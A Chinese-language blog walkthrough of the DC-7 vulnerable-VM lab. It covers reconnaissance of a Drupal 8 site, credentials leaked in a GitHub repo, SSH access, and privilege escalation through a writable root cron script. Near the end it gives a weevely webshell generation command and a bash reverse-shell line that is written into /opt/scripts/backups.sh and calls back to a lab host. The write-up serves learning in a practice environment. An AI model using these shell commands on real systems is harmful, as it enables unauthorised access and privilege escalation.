基本步骤

经验 & 总结

  1. 对信息还是不敏感,其实也是因为对Drupal这个CMS并不熟悉,不知道哪些地方是默认的那些地方是作者修改,比如这个“DC7USER”。
  2. 对Drupal这个CMS不熟悉,不知道Drush这个工具是什么东西,一开始根本就没注意到;也不知道Drupal可以通过Web页面编写PHP脚本。
  3. 一开始在dc7user的shell中探测计划任务,crontab计划任务中并没有/opt/scripts/backups.sh因为权限不够
  4. 在最后修改计划任务脚本时需要注意,一定要确保文件头#!/bin/bash,否则无法正常执行。==原因不详,还请各位大佬告知==

步骤流水

进行端口探测,得到只开放了两个端口:22、 80端口

  • 对80端口进行检查

  • CMS为Drupal8框架

  • robots.txt 中透露了22个目录,不知道有没有线索。我不知道正常drupal8安装后robots.txt内容是什么样

  • msf一把梭:msf搜索相关漏洞,包含了exploit-db中的最新exp,无脑测试,都失败了。

  • 到这一步懵逼了,但是可以确定还是需要从80端口突破

  • 偷看一眼参考答案,需要在某个不存在的网站上搜索DC7USER(信息搜集的重要性……),可以找到一个github仓库地址,根据README中的信息,得知该仓库存放的是web的部分代码。

    • 大致浏览一下,有几个文件看起来和登录有关。

    • 直接搜索“password”发现包含用户名和密码,而且看起来好像是数据库的用户名和密码,但是nmap扫描结果中并没有与数据库相关的信息,推测是对外屏蔽了端口。

    • 依次尝试目前得到的登录接口:尝试登录drupal,失败;测试登录ssh,成功。

  • SSH:

    • 直接尝试已知的提权办法,脚本扫一扫、参考cheatsheet试试看,没成功。

    • 提示有个新邮件,ls查看当前目录下有两个文件,一个文本文件叫mbox,一个backups文件夹

    • 查看当前进程确认有mysqld在运行,尝试登录,提示被禁止。尝试运行sudo命令,提示该命令不存在。

    • 查看mbox

      • 虽然很长,但是内容基本重复,可以得到的信息是存在一个定时任务,备份数据库文件

    • scp -r dc7user@10.0.2.9:/home/dc7user/backups ./复制文件到本地进行查看,但是是加密文件。

      查看计划任务脚本,得到密码

    • 数据库备份文件超大33M,感兴趣的是里面的users_field_data表,可以查询到用户名和加密后的密码。另外查看了备份的web目录,没有写死的用户名和密码。

  • 至此再次陷入僵局

再次翻看参考答案:突破点在/opt/scripts/backups.sh脚本上

  • backups.sh

    • 查看权限可以看出该脚本属组并不是root而是www-data,同时www-data有对该文件的完全控制权

    • 因此突破关键转移到如何获得一个www-data组中的用户,查询发现www-data组中仅包含www-data用户,www-data仅运行apache进程,因此需要通过web页面获得shell才能获取对backups.sh的修改权限。

    • 查看脚本中的内容,发现执行了drush命令

      Drush是Drupal的命令行shell和Unix脚本接口。Drush Core附带了许多有用的命令,可用于与模块/主题/配置文件等代码进行交互。

      一开始执行drush命令的时候总是提示:Command user-create needs a higher bootstrap level to run - you will need to invoke drush from a more functional Drupal environment to run this command.

      需要切换到项目根目录或Drupal中。没仔细看文档:通过在项目根目录或Drupal中的任何位置键入“ drush”,可以在Shell中运行Drush。另外,在这个脚本中也是先移动到web目录,再执行备份任务。

      通过drush user-password admin --password="new_pass"修改admin密码,成功登录drupal。为什么dc7user用户会有这个命令的控制权?还请大佬指点

    • 成功登录后台

  • 再一次歇逼,没用过Drupal,知道这个时候应该想办法写一个php的webshell,但是搜了一圈也没找到怎么通过Web后台写WebShell。

再次翻看参考答案(我是真的菜啊)

  • 为drupal添加一个插件,让它支持编辑PHP页面

    • 下载php-8.x-1.0.tar.gz,在后台安装并激活

    • weevely generate 123 ./shell.php生成一个webshell,通过web写入drupal

    • 发布之后使用weevely连接,可以得到一个www-data权限的shell

    • 在计划任务脚本后面添加反弹shell脚本,本机监听等待回连,耐心等待,通过邮件的时间可以得知该脚本每15分钟执行一次。

      echo "bash -i >& /dev/tcp/10.0.2.15/7777 0>&1" > /opt/scripts/backups.sh

最新文章

  1. NOI 题库 9272 题解
  2. [Redis]发布/订阅
  3. 关于Unity中SteamVR_Controller.Input的错误
  4. hibernate事务
  5. kafka在zookeeper中的存储结构
  6. C++中虚函数功能的实现机制
  7. JS实现等比例缩放图片
  8. Xpath学习笔记
  9. 工具类 util.Date 日期类
  10. javascript中的原型继承
  11. windows下部署免费ssl证书(letsencrypt)
  12. centOS 搭建pipelineDB docs
  13. CDH 集群机器上部署 Jupyter notebook 使用 Pyspark 读取 Hive 数据库
  14. No fallback instance of type class found for feign client user-service(转)
  15. tp5 Excel导出
  16. PHP反射机制实现自动依赖注入
  17. React.createElement: type is invalid -- expected a string (for built-in components) or a class/function (for composite components) but got: undefined.
  18. centos下安装配置jetty
  19. [日常] Go语言圣经-错误,函数值习题
  20. LINUX中关于SIGNAL的定义

热门文章

  1. java下载和环境变量配置
  2. C# MVC扩展方法
  3. C++-HDU1394-Minimum Inversion Number[数据结构][树状数组]
  4. 路飞-Redis
  5. 前端框架vue.js系列(9):Vue.extend、Vue.component与new Vue
  6. 在网页中插入背景音乐代码(html)
  7. 通过maven 打docker 镜像包,出错ADD failed: stat /var/lib/docker/tmp/docker-builderXXXXXX: no such file or dir
  8. 百炼OJ - 1001 - Exponentiation
  9. 三分钟快速上手TensorFlow 2.0 (上)——前置基础、模型建立与可视化
  10. MS Sqlserver删除字段最后的多余字符